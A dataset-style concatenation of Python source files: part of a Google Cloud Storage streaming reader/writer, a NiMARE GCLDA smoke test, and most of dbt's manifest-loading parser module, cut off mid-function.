"""Remove at most size bytes from our buffer and return them."""
# logger.debug('reading %r bytes from %r byte-long buffer', size, len(self._current_part))
size = size if size >= 0 else len(self._current_part)
part = self._current_part.read(size)
self._current_pos += len(part)
# logger.debug('part: %r', part)
return part
def _fill_buffer(self, size=-1):
size = size if size >= 0 else self._current_part._chunk_size
while len(self._current_part) < size and not self._eof:
bytes_read = self._current_part.fill(self._raw_reader)
if bytes_read == 0:
logger.debug('reached EOF while filling buffer')
self._eof = True
def __str__(self):
return "(%s, %r, %r)" % (self.__class__.__name__, self._blob.bucket.name, self._blob.name)
def __repr__(self):
return "%s(bucket=%r, blob=%r, buffer_size=%r)" % (
self.__class__.__name__, self._blob.bucket.name, self._blob.name, self._current_part_size,
)
class Writer(io.BufferedIOBase):
"""Writes bytes to GCS.
Implements the io.BufferedIOBase interface of the standard library."""
def __init__(
self,
bucket,
blob,
min_part_size=_DEFAULT_MIN_PART_SIZE,
client=None, # type: google.cloud.storage.Client
blob_properties=None,
):
if client is None:
client = google.cloud.storage.Client()
self._client = client
self._blob = self._client.bucket(bucket).blob(blob) # type: google.cloud.storage.Blob
assert min_part_size % _REQUIRED_CHUNK_MULTIPLE == 0, 'min part size must be a multiple of 256KB'
        assert min_part_size >= _MIN_MIN_PART_SIZE, 'min part size must be at least 256KB'
self._min_part_size = min_part_size
self._total_size = 0
self._total_parts = 0
self._bytes_uploaded = 0
self._current_part = io.BytesIO()
self._session = google.auth.transport.requests.AuthorizedSession(client._credentials)
if blob_properties:
for k, v in blob_properties.items():
setattr(self._blob, k, v)
#
# https://cloud.google.com/storage/docs/json_api/v1/how-tos/resumable-upload#start-resumable
#
self._resumable_upload_url = self._blob.create_resumable_upload_session()
#
# This member is part of the io.BufferedIOBase interface.
#
self.raw = None
def flush(self):
pass
#
# Override some methods from io.IOBase.
#
def close(self):
logger.debug("closing")
if not self.closed:
if self._total_size == 0: # empty files
self._upload_empty_part()
else:
self._upload_part(is_last=True)
self._client = None
logger.debug("successfully closed")
@property
def closed(self):
return self._client is None
def writable(self):
"""Return True if the stream supports writing."""
return True
def seekable(self):
"""If False, seek(), tell() and truncate() will raise IOError.
We offer only tell support, and no seek or truncate support."""
return True
def seek(self, offset, whence=constants.WHENCE_START):
"""Unsupported."""
raise io.UnsupportedOperation
def truncate(self, size=None):
"""Unsupported."""
raise io.UnsupportedOperation
def tell(self):
"""Return the current stream position."""
return self._total_size
#
# io.BufferedIOBase methods.
#
def detach(self):
raise io.UnsupportedOperation("detach() not supported")
def write(self, b):
"""Write the given bytes (binary string) to the GCS file.
There's buffering happening under the covers, so this may not actually
do any HTTP transfer right away."""
if not isinstance(b, _BINARY_TYPES):
raise TypeError("input must be one of %r, got: %r" % (_BINARY_TYPES, type(b)))
self._current_part.write(b)
self._total_size += len(b)
#
# If the size of this part is precisely equal to the minimum part size,
# we don't perform the actual write now, and wait until we see more data.
# We do this because the very last part of the upload must be handled slightly
# differently (see comments in the _upload_part method).
#
if self._current_part.tell() > self._min_part_size:
self._upload_part()
return len(b)
def terminate(self):
"""Cancel the underlying resumable upload."""
#
# https://cloud.google.com/storage/docs/xml-api/resumable-upload#example_cancelling_an_upload
#
self._session.delete(self._resumable_upload_url)
#
# Internal methods.
#
def _upload_part(self, is_last=False):
part_num = self._total_parts + 1
#
# Here we upload the largest amount possible given GCS's restriction
# of parts being multiples of 256kB, except for the last one.
#
# A final upload of 0 bytes does not work, so we need to guard against
# this edge case. This results in occasionally keeping an additional
# 256kB in the buffer after uploading a part, but until this is fixed
# on Google's end there is no other option.
#
# https://stackoverflow.com/questions/60230631/upload-zero-size-final-part-to-google-cloud-storage-resumable-upload
#
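        # Worked example (assumed numbers): with min_part_size of 256 KiB and
        # a buffer holding 300 KiB, remainder = 300 KiB % 256 KiB = 44 KiB, so
        # a non-final part uploads 256 KiB now and keeps 44 KiB buffered; if
        # the remainder were 0, one extra 256 KiB chunk is held back instead.
        #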
content_length = self._current_part.tell()
remainder = content_length % self._min_part_size
if is_last:
end = self._bytes_uploaded + content_length
elif remainder == 0:
content_length -= _REQUIRED_CHUNK_MULTIPLE
end = None
else:
content_length -= remainder
end = None
range_stop = self._bytes_uploaded + content_length - 1
content_range = _make_range_string(self._bytes_uploaded, range_stop, end=end)
headers = {
'Content-Length': str(content_length),
'Content-Range': content_range,
}
logger.info(
"uploading part #%i, %i bytes (total %.3fGB) headers %r",
part_num, content_length, range_stop / 1024.0 ** 3, headers,
)
self._current_part.seek(0)
response = self._session.put(
self._resumable_upload_url,
data=self._current_part.read(content_length),
headers=headers,
)
if is_last:
expected = _UPLOAD_COMPLETE_STATUS_CODES
else:
expected = _UPLOAD_INCOMPLETE_STATUS_CODES
if response.status_code not in expected:
_fail(response, part_num, content_length, self._total_size, headers)
logger.debug("upload of part #%i finished" % part_num)
self._total_parts += 1
self._bytes_uploaded += content_length
#
# For the last part, the below _current_part handling is a NOOP.
#
self._current_part = io.BytesIO(self._current_part.read())
self._current_part.seek(0, io.SEEK_END)
def _upload_empty_part(self):
logger.debug("creating empty file")
headers = {'Content-Length': '0'}
response = self._session.put(self._resumable_upload_url, headers=headers)
if response.status_code not in _UPLOAD_COMPLETE_STATUS_CODES:
_fail(response, self._total_parts + 1, 0, self._total_size, headers)
self._total_parts += 1
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
self.terminate()
else:
self.close()
def __str__(self):
return "(%s, %r, %r)" % (self.__class__.__name__, self._blob.bucket.name, self._blob.name)
def __repr__(self):
return "%s(bucket=%r, blob=%r, min_part_size=%r)" % (
self.__class__.__name__, self._blob.bucket.name, self._blob.name, self._min_part_size,
)
| 32.811352 | 123 | 0.622062 |
8b3098d060c7789b83d5add883bc452e0dd98a99 | 1,224 | py | Python | nimare/tests/test_annotate_gclda.py | akimbler/NiMARE | 717697035b04ff0244aa4aa170f5aa16a9fba69a | [
"MIT"
] | null | null | null | nimare/tests/test_annotate_gclda.py | akimbler/NiMARE | 717697035b04ff0244aa4aa170f5aa16a9fba69a | [
"MIT"
] | null | null | null | nimare/tests/test_annotate_gclda.py | akimbler/NiMARE | 717697035b04ff0244aa4aa170f5aa16a9fba69a | [
"MIT"
] | null | null | null | """
Test nimare.annotate.gclda (GCLDA).
"""
import os.path as op
import numpy as np
import pandas as pd
import nibabel as nib
import nimare
from nimare import annotate, decode
from .utils import get_test_data_path
def test_gclda():
"""
A smoke test for GCLDA.
"""
# A small test dataset with abstracts
dset = nimare.dataset.Dataset.load(
op.join(get_test_data_path(), "neurosynth_laird_studies.pkl.gz")
)
counts_df = annotate.text.generate_counts(
dset.texts, text_column="abstract", tfidf=False, min_df=1, max_df=1.0
)
model = annotate.gclda.GCLDAModel(counts_df, dset.coordinates, mask=dset.masker.mask_img)
model.fit(n_iters=5, loglikely_freq=5)
arr = np.zeros(dset.masker.mask_img.shape, int)
arr[40:44, 45:49, 40:44] = 1
mask_img = nib.Nifti1Image(arr, dset.masker.mask_img.affine)
decoded_df, _ = decode.discrete.gclda_decode_roi(model, mask_img)
assert isinstance(decoded_df, pd.DataFrame)
decoded_df, _ = decode.continuous.gclda_decode_map(model, mask_img)
assert isinstance(decoded_df, pd.DataFrame)
encoded_img, _ = decode.encode.gclda_encode(model, "fmri activation")
assert isinstance(encoded_img, nib.Nifti1Image)
| 32.210526 | 93 | 0.723039 |
4bb3df2cb4d3c8113fcd128889a9ab53c05d58af | 44,954 | py | Python | core/dbt/parser/manifest.py | juma-adoreme/dbt | b37f6a010e549f1f0150846e9f74526099e55a3f | [
"Apache-2.0"
] | 1 | 2021-09-09T20:22:43.000Z | 2021-09-09T20:22:43.000Z | core/dbt/parser/manifest.py | rfan-debug/dbt | 44e7390526c087ec73f2b1160e2783d44d2c34c0 | [
"Apache-2.0"
] | null | null | null | core/dbt/parser/manifest.py | rfan-debug/dbt | 44e7390526c087ec73f2b1160e2783d44d2c34c0 | [
"Apache-2.0"
] | null | null | null | from dataclasses import dataclass
from dataclasses import field
import os
import traceback
from typing import (
Dict, Optional, Mapping, Callable, Any, List, Type, Union, Tuple
)
import time
import dbt.exceptions
import dbt.tracking
import dbt.flags as flags
from dbt.adapters.factory import (
get_adapter,
get_relation_class_by_name,
get_adapter_package_names,
)
from dbt.helper_types import PathSet
from dbt.logger import GLOBAL_LOGGER as logger, DbtProcessState
from dbt.node_types import NodeType
from dbt.clients.jinja import get_rendered, MacroStack
from dbt.clients.jinja_static import statically_extract_macro_calls
from dbt.clients.system import make_directory
from dbt.config import Project, RuntimeConfig
from dbt.context.docs import generate_runtime_docs
from dbt.context.macro_resolver import MacroResolver, TestMacroNamespace
from dbt.context.configured import generate_macro_context
from dbt.context.providers import ParseProvider
from dbt.contracts.files import FileHash, ParseFileType, SchemaSourceFile
from dbt.parser.read_files import read_files, load_source_file
from dbt.parser.partial import PartialParsing
from dbt.contracts.graph.compiled import ManifestNode
from dbt.contracts.graph.manifest import (
Manifest, Disabled, MacroManifest, ManifestStateCheck, ParsingInfo
)
from dbt.contracts.graph.parsed import (
ParsedSourceDefinition, ParsedNode, ParsedMacro, ColumnInfo, ParsedExposure
)
from dbt.contracts.util import Writable
from dbt.exceptions import (
ref_target_not_found,
get_target_not_found_or_disabled_msg,
source_target_not_found,
get_source_not_found_or_disabled_msg,
warn_or_error,
)
from dbt.parser.base import Parser
from dbt.parser.analysis import AnalysisParser
from dbt.parser.data_test import DataTestParser
from dbt.parser.docs import DocumentationParser
from dbt.parser.hooks import HookParser
from dbt.parser.macros import MacroParser
from dbt.parser.models import ModelParser
from dbt.parser.schemas import SchemaParser
from dbt.parser.search import FileBlock
from dbt.parser.seeds import SeedParser
from dbt.parser.snapshots import SnapshotParser
from dbt.parser.sources import SourcePatcher
from dbt.ui import warning_tag
from dbt.version import __version__
from dbt.dataclass_schema import StrEnum, dbtClassMixin
PARTIAL_PARSE_FILE_NAME = 'partial_parse.msgpack'
PARSING_STATE = DbtProcessState('parsing')
DEFAULT_PARTIAL_PARSE = False
class ReparseReason(StrEnum):
version_mismatch = '01_version_mismatch'
file_not_found = '02_file_not_found'
vars_changed = '03_vars_changed'
profile_changed = '04_profile_changed'
deps_changed = '05_deps_changed'
project_config_changed = '06_project_config_changed'
load_file_failure = '07_load_file_failure'
exception = '08_exception'
# Part of saved performance info
@dataclass
class ParserInfo(dbtClassMixin):
parser: str
elapsed: float
parsed_path_count: int = 0
# Part of saved performance info
@dataclass
class ProjectLoaderInfo(dbtClassMixin):
project_name: str
elapsed: float
parsers: List[ParserInfo] = field(default_factory=list)
parsed_path_count: int = 0
# Part of saved performance info
@dataclass
class ManifestLoaderInfo(dbtClassMixin, Writable):
path_count: int = 0
parsed_path_count: int = 0
static_analysis_path_count: int = 0
static_analysis_parsed_path_count: int = 0
is_partial_parse_enabled: Optional[bool] = None
is_static_analysis_enabled: Optional[bool] = None
read_files_elapsed: Optional[float] = None
load_macros_elapsed: Optional[float] = None
parse_project_elapsed: Optional[float] = None
patch_sources_elapsed: Optional[float] = None
process_manifest_elapsed: Optional[float] = None
load_all_elapsed: Optional[float] = None
projects: List[ProjectLoaderInfo] = field(default_factory=list)
_project_index: Dict[str, ProjectLoaderInfo] = field(default_factory=dict)
def __post_serialize__(self, dct):
del dct['_project_index']
return dct
# The ManifestLoader loads the manifest. The standard way to use the
# ManifestLoader is using the 'get_full_manifest' class method, but
# many tests use abbreviated processes.
class ManifestLoader:
def __init__(
self,
root_project: RuntimeConfig,
all_projects: Mapping[str, Project],
macro_hook: Optional[Callable[[Manifest], Any]] = None,
) -> None:
self.root_project: RuntimeConfig = root_project
self.all_projects: Mapping[str, Project] = all_projects
self.manifest: Manifest = Manifest()
self.manifest.metadata = root_project.get_metadata()
self.started_at = int(time.time())
# This is a MacroQueryStringSetter callable, which is called
# later after we set the MacroManifest in the adapter. It sets
# up the query headers.
self.macro_hook: Callable[[Manifest], Any]
if macro_hook is None:
self.macro_hook = lambda m: None
else:
self.macro_hook = macro_hook
self._perf_info = self.build_perf_info()
# State check determines whether the saved_manifest and the current
# manifest match well enough to do partial parsing
self.manifest.state_check = self.build_manifest_state_check()
# We need to know if we're actually partially parsing. It could
# have been enabled, but not happening because of some issue.
self.partially_parsing = False
# This is a saved manifest from a previous run that's used for partial parsing
self.saved_manifest: Optional[Manifest] = self.read_manifest_for_partial_parse()
# This is the method that builds a complete manifest. We sometimes
# use an abbreviated process in tests.
@classmethod
def get_full_manifest(
cls,
config: RuntimeConfig,
*,
reset: bool = False,
) -> Manifest:
adapter = get_adapter(config) # type: ignore
# reset is set in a TaskManager load_manifest call, since
# the config and adapter may be persistent.
if reset:
config.clear_dependencies()
adapter.clear_macro_manifest()
macro_hook = adapter.connections.set_query_header
with PARSING_STATE: # set up logbook.Processor for parsing
# Start performance counting
start_load_all = time.perf_counter()
projects = config.load_dependencies()
loader = ManifestLoader(config, projects, macro_hook)
manifest = loader.load()
_check_manifest(manifest, config)
manifest.build_flat_graph()
# This needs to happen after loading from a partial parse,
# so that the adapter has the query headers from the macro_hook.
loader.save_macros_to_adapter(adapter)
# Save performance info
loader._perf_info.load_all_elapsed = (
time.perf_counter() - start_load_all
)
loader.track_project_load()
return manifest
# This is where the main action happens
def load(self):
# Read files creates a dictionary of projects to a dictionary
# of parsers to lists of file strings. The file strings are
# used to get the SourceFiles from the manifest files.
start_read_files = time.perf_counter()
project_parser_files = {}
for project in self.all_projects.values():
read_files(project, self.manifest.files, project_parser_files)
self._perf_info.path_count = len(self.manifest.files)
self._perf_info.read_files_elapsed = (time.perf_counter() - start_read_files)
skip_parsing = False
if self.saved_manifest is not None:
partial_parsing = PartialParsing(self.saved_manifest, self.manifest.files)
skip_parsing = partial_parsing.skip_parsing()
if skip_parsing:
# nothing changed, so we don't need to generate project_parser_files
self.manifest = self.saved_manifest
else:
# create child_map and parent_map
self.saved_manifest.build_parent_and_child_maps()
# files are different, we need to create a new set of
# project_parser_files.
try:
project_parser_files = partial_parsing.get_parsing_files()
self.partially_parsing = True
self.manifest = self.saved_manifest
except Exception:
# pp_files should still be the full set and manifest is new manifest,
# since get_parsing_files failed
logger.info("Partial parsing enabled but an error occurred. "
"Switching to a full re-parse.")
# Get traceback info
tb_info = traceback.format_exc()
formatted_lines = tb_info.splitlines()
(_, line, method) = formatted_lines[-3].split(', ')
exc_info = {
"traceback": tb_info,
"exception": formatted_lines[-1],
"code": formatted_lines[-2],
"location": f"{line} {method}",
}
# get file info for local logs
parse_file_type = None
file_id = partial_parsing.processing_file
if file_id and file_id in self.manifest.files:
old_file = self.manifest.files[file_id]
parse_file_type = old_file.parse_file_type
logger.debug(f"Partial parsing exception processing file {file_id}")
file_dict = old_file.to_dict()
logger.debug(f"PP file: {file_dict}")
exc_info['parse_file_type'] = parse_file_type
logger.debug(f"PP exception info: {exc_info}")
# Send event
if dbt.tracking.active_user is not None:
exc_info['full_reparse_reason'] = ReparseReason.exception
dbt.tracking.track_partial_parser(exc_info)
if self.manifest._parsing_info is None:
self.manifest._parsing_info = ParsingInfo()
if skip_parsing:
logger.info("Partial parsing enabled, no changes found, skipping parsing")
else:
# Load Macros
# We need to parse the macros first, so they're resolvable when
# the other files are loaded
start_load_macros = time.perf_counter()
for project in self.all_projects.values():
if project.project_name not in project_parser_files:
continue
parser_files = project_parser_files[project.project_name]
if 'MacroParser' not in parser_files:
continue
parser = MacroParser(project, self.manifest)
for file_id in parser_files['MacroParser']:
block = FileBlock(self.manifest.files[file_id])
parser.parse_file(block)
# increment parsed path count for performance tracking
self._perf_info.parsed_path_count = self._perf_info.parsed_path_count + 1
# Look at changed macros and update the macro.depends_on.macros
self.macro_depends_on()
self._perf_info.load_macros_elapsed = (time.perf_counter() - start_load_macros)
# Now that the macros are parsed, parse the rest of the files.
# This is currently done on a per project basis.
start_parse_projects = time.perf_counter()
# Load the rest of the files except for schema yaml files
parser_types: List[Type[Parser]] = [
ModelParser, SnapshotParser, AnalysisParser, DataTestParser,
SeedParser, DocumentationParser, HookParser]
for project in self.all_projects.values():
if project.project_name not in project_parser_files:
continue
self.parse_project(
project,
project_parser_files[project.project_name],
parser_types
)
# Now that we've loaded most of the nodes (except for schema tests and sources)
# load up the Lookup objects to resolve them by name, so the SourceFiles store
# the unique_id instead of the name. Sources are loaded from yaml files, so
# aren't in place yet
self.manifest.rebuild_ref_lookup()
self.manifest.rebuild_doc_lookup()
# Load yaml files
parser_types = [SchemaParser]
for project in self.all_projects.values():
if project.project_name not in project_parser_files:
continue
self.parse_project(
project,
project_parser_files[project.project_name],
parser_types
)
self._perf_info.parse_project_elapsed = (time.perf_counter() - start_parse_projects)
# patch_sources converts the UnparsedSourceDefinitions in the
# Manifest.sources to ParsedSourceDefinition via 'patch_source'
# in SourcePatcher
start_patch = time.perf_counter()
patcher = SourcePatcher(self.root_project, self.manifest)
patcher.construct_sources()
self.manifest.sources = patcher.sources
self._perf_info.patch_sources_elapsed = (
time.perf_counter() - start_patch
)
# ParseResults had a 'disabled' attribute which was a dictionary
# which is now named '_disabled'. This used to copy from
# ParseResults to the Manifest.
# TODO: normalize to only one disabled
disabled = []
for value in self.manifest._disabled.values():
disabled.extend(value)
self.manifest.disabled = disabled
# copy the selectors from the root_project to the manifest
self.manifest.selectors = self.root_project.manifest_selectors
# update the refs, sources, and docs
# These check the created_at time on the nodes to
        # determine whether they need processing.
start_process = time.perf_counter()
self.process_sources(self.root_project.project_name)
self.process_refs(self.root_project.project_name)
self.process_docs(self.root_project)
# update tracking data
self._perf_info.process_manifest_elapsed = (
time.perf_counter() - start_process
)
self._perf_info.static_analysis_parsed_path_count = (
self.manifest._parsing_info.static_analysis_parsed_path_count
)
self._perf_info.static_analysis_path_count = (
self.manifest._parsing_info.static_analysis_path_count
)
# write out the fully parsed manifest
self.write_manifest_for_partial_parse()
return self.manifest
# Parse the files in the 'parser_files' dictionary, for parsers listed in
# 'parser_types'
def parse_project(
self,
project: Project,
parser_files,
parser_types: List[Type[Parser]],
) -> None:
project_loader_info = self._perf_info._project_index[project.project_name]
start_timer = time.perf_counter()
total_parsed_path_count = 0
# Loop through parsers with loaded files.
for parser_cls in parser_types:
parser_name = parser_cls.__name__
# No point in creating a parser if we don't have files for it
if parser_name not in parser_files or not parser_files[parser_name]:
continue
# Initialize timing info
project_parsed_path_count = 0
parser_start_timer = time.perf_counter()
# Parse the project files for this parser
parser: Parser = parser_cls(project, self.manifest, self.root_project)
for file_id in parser_files[parser_name]:
block = FileBlock(self.manifest.files[file_id])
if isinstance(parser, SchemaParser):
assert isinstance(block.file, SchemaSourceFile)
if self.partially_parsing:
dct = block.file.pp_dict
else:
dct = block.file.dict_from_yaml
parser.parse_file(block, dct=dct)
else:
parser.parse_file(block)
project_parsed_path_count = project_parsed_path_count + 1
# Save timing info
project_loader_info.parsers.append(ParserInfo(
parser=parser.resource_type,
parsed_path_count=project_parsed_path_count,
elapsed=time.perf_counter() - parser_start_timer
))
total_parsed_path_count = total_parsed_path_count + project_parsed_path_count
# HookParser doesn't run from loaded files, just dbt_project.yml,
# so do separately
# This shouldn't need to be parsed again if we're starting from
# a saved manifest, because that won't be allowed if dbt_project.yml
# changed, but leave for now.
if not self.partially_parsing and HookParser in parser_types:
hook_parser = HookParser(project, self.manifest, self.root_project)
path = hook_parser.get_path()
file = load_source_file(path, ParseFileType.Hook, project.project_name)
if file:
file_block = FileBlock(file)
hook_parser.parse_file(file_block)
# Store the performance info
elapsed = time.perf_counter() - start_timer
project_loader_info.parsed_path_count = (
project_loader_info.parsed_path_count + total_parsed_path_count
)
project_loader_info.elapsed = project_loader_info.elapsed + elapsed
self._perf_info.parsed_path_count = (
self._perf_info.parsed_path_count + total_parsed_path_count
)
# Loop through macros in the manifest and statically parse
# the 'macro_sql' to find depends_on.macros
def macro_depends_on(self):
internal_package_names = get_adapter_package_names(
self.root_project.credentials.type
)
macro_resolver = MacroResolver(
self.manifest.macros,
self.root_project.project_name,
internal_package_names
)
macro_ctx = generate_macro_context(self.root_project)
macro_namespace = TestMacroNamespace(
macro_resolver, {}, None, MacroStack(), []
)
adapter = get_adapter(self.root_project)
db_wrapper = ParseProvider().DatabaseWrapper(
adapter, macro_namespace
)
for macro in self.manifest.macros.values():
if macro.created_at < self.started_at:
continue
possible_macro_calls = statically_extract_macro_calls(
macro.macro_sql, macro_ctx, db_wrapper)
for macro_name in possible_macro_calls:
# adapter.dispatch calls can generate a call with the same name as the macro
# it ought to be an adapter prefix (postgres_) or default_
if macro_name == macro.name:
continue
package_name = macro.package_name
if '.' in macro_name:
package_name, macro_name = macro_name.split('.')
dep_macro_id = macro_resolver.get_macro_id(package_name, macro_name)
if dep_macro_id:
macro.depends_on.add_macro(dep_macro_id) # will check for dupes
def write_manifest_for_partial_parse(self):
path = os.path.join(self.root_project.target_path,
PARTIAL_PARSE_FILE_NAME)
try:
# This shouldn't be necessary, but we have gotten bug reports (#3757) of the
# saved manifest not matching the code version.
if self.manifest.metadata.dbt_version != __version__:
logger.debug("Manifest metadata did not contain correct version. "
f"Contained '{self.manifest.metadata.dbt_version}' instead.")
self.manifest.metadata.dbt_version = __version__
manifest_msgpack = self.manifest.to_msgpack()
make_directory(os.path.dirname(path))
with open(path, 'wb') as fp:
fp.write(manifest_msgpack)
except Exception:
raise
def is_partial_parsable(self, manifest: Manifest) -> Tuple[bool, Optional[str]]:
"""Compare the global hashes of the read-in parse results' values to
the known ones, and return if it is ok to re-use the results.
"""
valid = True
reparse_reason = None
if manifest.metadata.dbt_version != __version__:
# #3757 log both versions because of reports of invalid cases of mismatch.
logger.info("Unable to do partial parsing because of a dbt version mismatch. "
f"Saved manifest version: {manifest.metadata.dbt_version}. "
f"Current version: {__version__}.")
# If the version is wrong, the other checks might not work
return False, ReparseReason.version_mismatch
if self.manifest.state_check.vars_hash != manifest.state_check.vars_hash:
logger.info("Unable to do partial parsing because config vars, "
"config profile, or config target have changed")
valid = False
reparse_reason = ReparseReason.vars_changed
if self.manifest.state_check.profile_hash != manifest.state_check.profile_hash:
# Note: This should be made more granular. We shouldn't need to invalidate
# partial parsing if a non-used profile section has changed.
logger.info("Unable to do partial parsing because profile has changed")
valid = False
reparse_reason = ReparseReason.profile_changed
missing_keys = {
k for k in self.manifest.state_check.project_hashes
if k not in manifest.state_check.project_hashes
}
if missing_keys:
logger.info("Unable to do partial parsing because a project dependency has been added")
valid = False
reparse_reason = ReparseReason.deps_changed
for key, new_value in self.manifest.state_check.project_hashes.items():
if key in manifest.state_check.project_hashes:
old_value = manifest.state_check.project_hashes[key]
if new_value != old_value:
logger.info("Unable to do partial parsing because "
"a project config has changed")
valid = False
reparse_reason = ReparseReason.project_config_changed
return valid, reparse_reason
def _partial_parse_enabled(self):
# if the CLI is set, follow that
if flags.PARTIAL_PARSE is not None:
return flags.PARTIAL_PARSE
# if the config is set, follow that
elif self.root_project.config.partial_parse is not None:
return self.root_project.config.partial_parse
else:
return DEFAULT_PARTIAL_PARSE
def read_manifest_for_partial_parse(self) -> Optional[Manifest]:
if not self._partial_parse_enabled():
logger.debug('Partial parsing not enabled')
return None
path = os.path.join(self.root_project.target_path,
PARTIAL_PARSE_FILE_NAME)
reparse_reason = None
if os.path.exists(path):
try:
with open(path, 'rb') as fp:
manifest_mp = fp.read()
manifest: Manifest = Manifest.from_msgpack(manifest_mp) # type: ignore
# keep this check inside the try/except in case something about
# the file has changed in weird ways, perhaps due to being a
# different version of dbt
is_partial_parseable, reparse_reason = self.is_partial_parsable(manifest)
if is_partial_parseable:
return manifest
except Exception as exc:
logger.debug(
'Failed to load parsed file from disk at {}: {}'
.format(path, exc),
exc_info=True
)
reparse_reason = ReparseReason.load_file_failure
else:
logger.info(f"Unable to do partial parsing because {path} not found")
reparse_reason = ReparseReason.file_not_found
# this event is only fired if a full reparse is needed
dbt.tracking.track_partial_parser({'full_reparse_reason': reparse_reason})
return None
def build_perf_info(self):
mli = ManifestLoaderInfo(
is_partial_parse_enabled=self._partial_parse_enabled(),
is_static_analysis_enabled=flags.USE_EXPERIMENTAL_PARSER
)
for project in self.all_projects.values():
project_info = ProjectLoaderInfo(
project_name=project.project_name,
elapsed=0,
)
mli.projects.append(project_info)
mli._project_index[project.project_name] = project_info
return mli
# TODO: this should be calculated per-file based on the vars() calls made in
# parsing, so changing one var doesn't invalidate everything. also there should
    # be something like that for env_var - currently changing env_vars in a way
    # that impacts graph selection or configs will result in weird test failures.
# finally, we should hash the actual profile used, not just root project +
# profiles.yml + relevant args. While sufficient, it is definitely overkill.
def build_manifest_state_check(self):
config = self.root_project
all_projects = self.all_projects
# if any of these change, we need to reject the parser
vars_hash = FileHash.from_contents(
'\x00'.join([
getattr(config.args, 'vars', '{}') or '{}',
getattr(config.args, 'profile', '') or '',
getattr(config.args, 'target', '') or '',
__version__
])
)
profile_path = os.path.join(config.args.profiles_dir, 'profiles.yml')
with open(profile_path) as fp:
profile_hash = FileHash.from_contents(fp.read())
project_hashes = {}
for name, project in all_projects.items():
path = os.path.join(project.project_root, 'dbt_project.yml')
with open(path) as fp:
project_hashes[name] = FileHash.from_contents(fp.read())
state_check = ManifestStateCheck(
vars_hash=vars_hash,
profile_hash=profile_hash,
project_hashes=project_hashes,
)
return state_check
def save_macros_to_adapter(self, adapter):
macro_manifest = MacroManifest(self.manifest.macros)
adapter._macro_manifest_lazy = macro_manifest
# This executes the callable macro_hook and sets the
# query headers
self.macro_hook(macro_manifest)
# This creates a MacroManifest which contains the macros in
# the adapter. Only called by the load_macros call from the
# adapter.
def create_macro_manifest(self):
for project in self.all_projects.values():
# what is the manifest passed in actually used for?
macro_parser = MacroParser(project, self.manifest)
for path in macro_parser.get_paths():
source_file = load_source_file(
path, ParseFileType.Macro, project.project_name)
block = FileBlock(source_file)
# This does not add the file to the manifest.files,
# but that shouldn't be necessary here.
macro_parser.parse_file(block)
macro_manifest = MacroManifest(self.manifest.macros)
return macro_manifest
# This is called by the adapter code only, to create the
# MacroManifest that's stored in the adapter.
# 'get_full_manifest' uses a persistent ManifestLoader while this
# creates a temporary ManifestLoader and throws it away.
# Not sure when this would actually get used except in tests.
# The ManifestLoader loads macros with other files, then copies
# into the adapter MacroManifest.
@classmethod
def load_macros(
cls,
root_config: RuntimeConfig,
macro_hook: Callable[[Manifest], Any],
) -> Manifest:
with PARSING_STATE:
projects = root_config.load_dependencies()
# This creates a loader object, including result,
# and then throws it away, returning only the
# manifest
loader = cls(root_config, projects, macro_hook)
macro_manifest = loader.create_macro_manifest()
return macro_manifest
# Create tracking event for saving performance info
def track_project_load(self):
invocation_id = dbt.tracking.active_user.invocation_id
dbt.tracking.track_project_load({
"invocation_id": invocation_id,
"project_id": self.root_project.hashed_name(),
"path_count": self._perf_info.path_count,
"parsed_path_count": self._perf_info.parsed_path_count,
"read_files_elapsed": self._perf_info.read_files_elapsed,
"load_macros_elapsed": self._perf_info.load_macros_elapsed,
"parse_project_elapsed": self._perf_info.parse_project_elapsed,
"patch_sources_elapsed": self._perf_info.patch_sources_elapsed,
"process_manifest_elapsed": (
self._perf_info.process_manifest_elapsed
),
"load_all_elapsed": self._perf_info.load_all_elapsed,
"is_partial_parse_enabled": (
self._perf_info.is_partial_parse_enabled
),
"is_static_analysis_enabled": self._perf_info.is_static_analysis_enabled,
"static_analysis_path_count": self._perf_info.static_analysis_path_count,
"static_analysis_parsed_path_count": self._perf_info.static_analysis_parsed_path_count,
})
# Takes references in 'refs' array of nodes and exposures, finds the target
# node, and updates 'depends_on.nodes' with the unique id
def process_refs(self, current_project: str):
for node in self.manifest.nodes.values():
if node.created_at < self.started_at:
continue
_process_refs_for_node(self.manifest, current_project, node)
for exposure in self.manifest.exposures.values():
if exposure.created_at < self.started_at:
continue
_process_refs_for_exposure(self.manifest, current_project, exposure)
# nodes: node and column descriptions
# sources: source and table descriptions, column descriptions
# macros: macro argument descriptions
# exposures: exposure descriptions
def process_docs(self, config: RuntimeConfig):
for node in self.manifest.nodes.values():
if node.created_at < self.started_at:
continue
ctx = generate_runtime_docs(
config,
node,
self.manifest,
config.project_name,
)
_process_docs_for_node(ctx, node)
for source in self.manifest.sources.values():
if source.created_at < self.started_at:
continue
ctx = generate_runtime_docs(
config,
source,
self.manifest,
config.project_name,
)
_process_docs_for_source(ctx, source)
for macro in self.manifest.macros.values():
if macro.created_at < self.started_at:
continue
ctx = generate_runtime_docs(
config,
macro,
self.manifest,
config.project_name,
)
_process_docs_for_macro(ctx, macro)
for exposure in self.manifest.exposures.values():
if exposure.created_at < self.started_at:
continue
ctx = generate_runtime_docs(
config,
exposure,
self.manifest,
config.project_name,
)
_process_docs_for_exposure(ctx, exposure)
# Loops through all nodes and exposures, for each element in
# 'sources' array finds the source node and updates the
# 'depends_on.nodes' array with the unique id
def process_sources(self, current_project: str):
for node in self.manifest.nodes.values():
if node.resource_type == NodeType.Source:
continue
assert not isinstance(node, ParsedSourceDefinition)
if node.created_at < self.started_at:
continue
_process_sources_for_node(self.manifest, current_project, node)
for exposure in self.manifest.exposures.values():
if exposure.created_at < self.started_at:
continue
_process_sources_for_exposure(self.manifest, current_project, exposure)
def invalid_ref_fail_unless_test(node, target_model_name,
target_model_package, disabled):
if node.resource_type == NodeType.Test:
msg = get_target_not_found_or_disabled_msg(
node, target_model_name, target_model_package, disabled
)
if disabled:
logger.debug(warning_tag(msg))
else:
warn_or_error(
msg,
log_fmt=warning_tag('{}')
)
else:
ref_target_not_found(
node,
target_model_name,
target_model_package,
disabled=disabled,
)
def invalid_source_fail_unless_test(
node, target_name, target_table_name, disabled
):
if node.resource_type == NodeType.Test:
msg = get_source_not_found_or_disabled_msg(
node, target_name, target_table_name, disabled
)
if disabled:
logger.debug(warning_tag(msg))
else:
warn_or_error(
msg,
log_fmt=warning_tag('{}')
)
else:
source_target_not_found(
